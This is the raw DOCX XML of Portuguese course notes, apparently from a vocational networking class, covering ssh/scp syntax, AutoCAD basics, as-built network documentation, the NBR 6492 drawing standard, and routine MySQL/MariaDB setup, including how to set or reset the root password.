        </w:rPr>
        <w:t>whither_server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acessar o servidor</w:t>
      </w:r>
      <w:r w:rsidR="00885E5A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)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885E5A" w:rsidRPr="00885E5A" w:rsidRDefault="00885E5A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885E5A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tipos de acessos ssh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ssh usuario@ip -p porta (SE FOR UMA PORTA DIFERENTE)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scp origem(ip):/diretorio destino</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F677E8" w:rsidRPr="00F677E8" w:rsidRDefault="00F677E8" w:rsidP="00F677E8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 xml:space="preserve">scp -P nº da porta origem(ip):/diretorio destino </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004327B1" w:rsidRPr="00885E5A" w:rsidRDefault="00F677E8" w:rsidP="00D729CA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F677E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scp -r origem:caminho_dir</w:t>
      </w:r>
      <w:r w:rsidR="00885E5A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> destino (copia tudo do destino)</w:t>
      </w:r>
      <w:r w:rsidR="004327B1" w:rsidRPr="00C41A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B698F" w:rsidRPr="001B698F" w:rsidRDefault="001B698F" w:rsidP="008A679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8A679D" w:rsidRPr="008A679D" w:rsidRDefault="008A679D" w:rsidP="008A679D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3591"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1416"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00200CB3" w:rsidRDefault="00200CB3" w:rsidP="005C3F5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200CB3" w:rsidRDefault="00200CB3" w:rsidP="005C3F5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5C3F53" w:rsidRDefault="005C3F53" w:rsidP="005C3F53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1B6849" w:rsidRDefault="002C33AA" w:rsidP="0027385D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27385D" w:rsidRDefault="007D7019" w:rsidP="0027385D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6E2401" w:rsidRPr="006E2401" w:rsidRDefault="006E2401" w:rsidP="006E2401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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4526C" w:rsidRDefault="00E4526C" w:rsidP="006E2401">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/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NFRAESTRUTURA DE REDES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731BB6" w:rsidRPr="002D1CD2" w:rsidRDefault="00731BB6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2D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AUTOCAD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1CD2" w:rsidRPr="00946841" w:rsidRDefault="002D1CD2" w:rsidP="00946841">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>COMANDOS BÁSICOS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 xml:space="preserve">F8 - modo ortogonal - linhas </w:t>
      </w:r>
      <w:r w:rsidR="002D1CD2" w:rsidRPr="002D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>orizontais e verticais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>F9 - modo de precisão - só permite desenhar nas intersecções dos quadriláteros de fundo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>F7 - ativas/desativar linhas de grade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1CD2" w:rsidRPr="002D1CD2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>offset - duplica linha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731BB6" w:rsidRPr="00946841" w:rsidRDefault="002D1CD2" w:rsidP="00946841">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">COORDENADA CARTESIANA RELATIVA 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>comando line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 xml:space="preserve">@coordenada x,coordenada y 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>@3,3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1CD2" w:rsidRPr="002D1CD2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731BB6" w:rsidRPr="00946841" w:rsidRDefault="002D1CD2" w:rsidP="00946841">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>COORDENADA POLAR RELATIVA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>comando line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>@distância&lt;ângulo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731BB6" w:rsidRPr="002D1CD2" w:rsidRDefault="00731BB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>@13&lt;23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1CD2" w:rsidRPr="002D1CD2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2D1CD2" w:rsidRPr="00946841" w:rsidRDefault="002D1CD2" w:rsidP="00946841">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>DIMENSÕES ARQUITETÔNICAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731BB6" w:rsidRPr="002D1CD2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Parede externa </w:t>
      </w:r>
      <w:r w:rsidR="00731BB6" w:rsidRPr="002D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- 0.25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731BB6" w:rsidRPr="002D1CD2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Parede interna </w:t>
      </w:r>
      <w:r w:rsidR="00731BB6" w:rsidRPr="002D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- 0.15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731BB6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largura de porta - 0.90</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1CD2" w:rsidRPr="002D1CD2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731BB6" w:rsidRPr="00946841" w:rsidRDefault="002D1CD2" w:rsidP="00946841">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MUDAR COTA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731BB6" w:rsidRPr="002D1CD2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 xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00731BB6" w:rsidRPr="002D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>anottation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731BB6" w:rsidRPr="002D1CD2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 xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00731BB6" w:rsidRPr="002D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Manage Dimension Style</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731BB6" w:rsidRDefault="002D1CD2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2D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00731BB6" w:rsidRPr="002D1CD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>New</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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61067C" w:rsidRDefault="0061067C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1067C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AS BUILT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Definição de rotas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Dimensionamento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Orçamentos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Lista de materiais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Mão de obra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Custos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Diagrama Unifilar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Plano de face do rack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Plantas baixas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Fotos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Atas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061067C" w:rsidRP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Certificação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061067C" w:rsidRDefault="0061067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1067C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Memorial Descritivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6" w:rsidRPr="0061067C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61067C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As Built: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E00CF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Documento que</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> facilita o troubleshooting e inserção de novos ativos de rede </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6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asso 1 - Construir o cabeçalho do documento</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6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* Nome da empresa prestadora de serviço </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6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Título do documento, exemplo: documento de "As Built" do ambiente LAN Corporativa de Voz e Dados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6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Logotipo da empresa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6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Número de revisão</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6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Data de conclusão</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6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Autor, contato</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00CF6" w:rsidRDefault="00E00CF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Assinatura dos integrantes da solução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asso 2 - Histórico de versões do documento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Passo 3 - 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asso 4 - Criar inventário de hardware e software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Nome do equipamento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Número de série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MAC Address, caso seja necessário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Modelo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Versão do firmware e Sistemas Operacionais dos equipamentos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Fabricante</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB28EC" w:rsidRP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Endereços IP atribuídos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB28EC" w:rsidRPr="00CB28EC" w:rsidRDefault="00CB28EC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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00731BB6" w:rsidRPr="000E3B8A" w:rsidRDefault="000E3B8A" w:rsidP="000E3B8A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0E3B8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ABR 1994 NBR 6492</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4526C" w:rsidRPr="006E2401" w:rsidRDefault="009A48DA" w:rsidP="009A48DA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ojetos arquitetônicos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C51F66" w:rsidRDefault="00C51F66" w:rsidP="00C51F66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C51F66">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Carimnbo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O carimbo inferior direito das folhas de desenho deve ser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reservado ao carimbo destinado à legenda de titulação e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numeração  dos  desenhos.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4.3.1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 xml:space="preserve"> Devem constar da legenda, no mínimo, as seguintes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informações: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a) identificação  da  empresa  e  do  profissional  res-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ponsável  pelo  projeto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b) identificação  do  cliente,  nome  do  projeto  ou  do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empreendimento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c ) título do desenho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d) indicação  seqüencial  do  projeto  (números  ou  le-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tras)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e) escalas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f)  data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g) autoria do desenho e do projeto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h) indicação  de  revisão.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Exemplar para uso exclusivo - SERVIÇO NACIONAL DE APRENDIZAGEM INDUSTRIAL - SENAIDN - 33.564.543/0001-90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Impresso por: SP - ALUNO DO SENAI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SERVIÇO NACIONAL DE APRENDIZAGEM INDUSTRIAL - SENAI-SP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NBR 6492/1994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3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4.3.2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 xml:space="preserve"> Outras informações devem localizar-se próximo do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carimbo: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a)  planta-chave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b)  escalas  gráficas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c)  descrição  da  revisão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d)  convenções  gráficas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e) notas gerais;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f)  desenhos  de  referência.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4.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C51F66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 xml:space="preserve">  Indicação  do  norte,  regime  de  ventos,  etc.  podem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094733B" w:rsidRPr="00C51F66" w:rsidRDefault="00C51F66" w:rsidP="00C51F66">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51F66">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>também  constar  próximo  do  carimbo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C51F66" w:rsidRDefault="00C51F66" w:rsidP="00C51F66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4DEF98E1" wp14:editId="7BC8D5B6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>146050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5847715" cy="169926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4" t="53580" r="6279" b="31140"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="584771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F66" w:rsidRDefault="00C51F66" w:rsidP="00C51F66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C51F66" w:rsidRDefault="00C51F66" w:rsidP="00C51F66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C51F66" w:rsidRDefault="00C51F66" w:rsidP="00C51F66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C51F66" w:rsidRDefault="00C51F66" w:rsidP="00C51F66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C51F66" w:rsidRDefault="00C51F66" w:rsidP="00C51F66">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3591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94733B" w:rsidRDefault="0094733B" w:rsidP="0094733B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="7699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94733B" w:rsidRDefault="0094733B" w:rsidP="0094733B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="7699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94733B" w:rsidRDefault="0094733B" w:rsidP="0094733B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="7699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E4526C" w:rsidRPr="00C51F66" w:rsidRDefault="00E4526C" w:rsidP="0094733B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="7699"/>
        </w:tabs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C51F66">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="0094733B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Máximo de comprimento: 18,5cm.</w:t>
      </w:r>
      <w:r w:rsidR="0094733B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C51F66" w:rsidRPr="006E2401" w:rsidRDefault="00C51F66" w:rsidP="002D1CD2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3591"/>
        </w:tabs>
        <w:spacing w:after="120"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Default="00E4526C" w:rsidP="006E2401">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/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GERENCIAMENTO DE REDES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A09FF" w:rsidRDefault="005A09FF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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BANCO DE DADOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A09FF" w:rsidRDefault="005A09FF" w:rsidP="005A09F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GBD - Sistema de Gerenciamento de Banco de Dados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A09FF" w:rsidRDefault="005A09FF" w:rsidP="005A09F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* Oracle</w:t>
      </w:r>
      <w:r w:rsidR="00C20C86">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C20C86" w:rsidRPr="00C20C86">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20C86" w:rsidRDefault="005A09FF" w:rsidP="005A09F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* MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20C86" w:rsidRDefault="00C20C86" w:rsidP="005A09F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* Maria DB (fork do MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20C86" w:rsidRDefault="00C20C86" w:rsidP="005A09F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* PostgreSQL (OpenSource) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20C86">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20C86" w:rsidRDefault="00C20C86" w:rsidP="005A09F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525769">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>* SQLServer (Microsoft)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525769" w:rsidRDefault="00525769" w:rsidP="005A09F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* Fire Bird (OpenSource)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A09FF" w:rsidRDefault="00525769" w:rsidP="00525769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QL - Structured Query Language</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590648" w:rsidRDefault="00590648" w:rsidP="00525769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NonSQL - não trabalha com a linguagem SQL. Trabalha com uma linguagem funcional</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590648" w:rsidRDefault="00590648" w:rsidP="00525769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* Mongo DB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C12E3" w:rsidRDefault="000C12E3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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MARIA DB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C12E3" w:rsidRDefault="00544E74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544E74">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apt install mysql-server ou apt install mariadb-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00544E74" w:rsidRDefault="006E1A13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ysql -u root -p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u:usuario, -p:password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E1A13" w:rsidRDefault="006E1A13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ysql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entrar no banco de dados pelo debian9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D834C7" w:rsidRDefault="00D834C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xit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</w:p>
    <w:p w:rsidR="00292EE0" w:rsidRDefault="00292EE0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292EE0" w:rsidRPr="00292EE0" w:rsidRDefault="00292EE0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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SETAR SENHA NO MYSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E1A13" w:rsidRDefault="006E1A13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et password for 'root'@'localhost' = password('mysql');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EE0" w:rsidRDefault="00292EE0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update </w:t>
      </w:r>
      <w:r w:rsidR="0075247F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mysql.user set authentication_string = password('mysql') where user = 'root' and host = 'localhost';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075247F" w:rsidRDefault="00B46922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46922">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>update mysql.user set plugin = '' where user = 'root' and host = 'localhost';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D834C7" w:rsidRDefault="00D834C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flush privileges;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB64F7" w:rsidRDefault="00CB64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CB64F7" w:rsidRPr="00CB64F7" w:rsidRDefault="00CB64F7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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REDEFINIR SENHA DO MYSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EE0" w:rsidRDefault="00CB64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/etc/init.d/mysql stop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB64F7" w:rsidRDefault="00CB64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CB64F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidR="00B46922">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB64F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_safe --skip-grant-tables &amp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modo de segurança do banco de dados; &amp;=entrar em segundo plano</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0AB6" w:rsidRDefault="00BC0AB6" w:rsidP="000C12E3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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0317F7" w:rsidRDefault="00BC0AB6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BC0AB6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>COMANDOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000317F7" w:rsidRDefault="000317F7" w:rsidP="000C12E3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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0317F7" w:rsidRDefault="000317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omandos principais: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000317F7" w:rsidRDefault="000317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insert;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000317F7" w:rsidRDefault="000317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delet</w:t>
      </w:r>
      <w:r w:rsidR="009905A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000317F7" w:rsidRDefault="000317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update;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000317F7" w:rsidRDefault="000317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select;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000317F7" w:rsidRDefault="000317F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BC0AB6" w:rsidRDefault="00BC0AB6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C0AB6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92BD2" w:rsidRDefault="00BC0AB6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reate database </w:t>
      </w:r>
      <w:r w:rsidR="00D90643">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>db_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste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="0031706D">
        <w:rPr>
